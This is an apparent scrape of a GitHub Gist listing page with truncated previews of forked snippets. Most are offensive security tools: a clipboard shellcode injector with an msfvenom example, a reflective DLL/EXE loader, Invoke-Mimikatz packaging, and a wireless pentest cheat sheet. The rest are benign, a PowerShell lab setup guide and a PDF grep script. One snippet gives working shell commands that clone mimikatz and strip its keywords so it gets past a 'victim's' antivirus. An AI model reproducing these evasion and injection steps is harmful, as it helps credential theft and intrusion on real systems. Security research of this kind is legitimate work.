Skip to content

Instantly share code, notes, and snippets.

johnjohnsp1 /
Created Dec 12, 2021 — forked from jdhitsolutions/
Detailed instructions for setting up the PowerShellLab for my Pluralsight courses.

PowerShell Lab Detailed Setup Instructions

For my Pluralsight PowerShell courses, you are welcome to use any lab environment you wish. It should include an Active Directory domain with at least a domain controller, a Windows 10 client, and a Windows Server 2016 or 2019 member server. You will need to modify the course files to fit your environment. At this point in time, Windows Server 2022 remains untested for my labs.

However, I am going to recommend that you use a free PowerShell module called PSAutoLab. I encourag you to look at the README document on the project's Github repository before proceeding. If you need help with the module or its commands, you will use the repository's Issue section.


Please refer to this document to assist in installing and setting up the PSAutolab module on your computer. Run all commands from an elevated Windows PowerShell

johnjohnsp1 / ClippyShellcodeInject.cs
Created Nov 25, 2021 — forked from Wra7h/ClippyShellcodeInject.cs
Clipboard Shellcode Injection
View ClippyShellcodeInject.cs
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject

Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.

First, they ensure that the script to execute matches the expected file hash. Example:

powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))
View ISeeSharpProcess.cs
using System;
using System.Diagnostics;
namespace ISeeSharpProcess
class Program
// Port of
static void GetCSharpProcess()
johnjohnsp1 / pdf-grep
Created Oct 16, 2020 — forked from ngregoire/pdf-grep
Grep through PDF files
View pdf-grep
# Three arguments: ROOT_DIR, PATTERN, OPTIONS
# Search below $ROOT_DIR for PDF files matching $PATTERN
# $OPTIONS is passed to pdfgrep (ex: grep-pdf . 'some words' -h -C5)
if [ -z "$1" ]; then
echo "! Argument ROOT_DIR is needed!"
View PsexecReflective.ps1
This file has been truncated, but you can view the full file.
function reflectit
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
johnjohnsp1 / Invoke-UpdateMimikatzScript.ps1
Created Jul 29, 2020 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
View Invoke-UpdateMimikatzScript.ps1
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link
Path to powerkatz.dll generated via Visual Studio.
Path to Invoke-Mimikatz.ps1 script.
View Wireless Penetration Testing Cheat

#Wireless Penetration Testing Cheat Sheet


  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up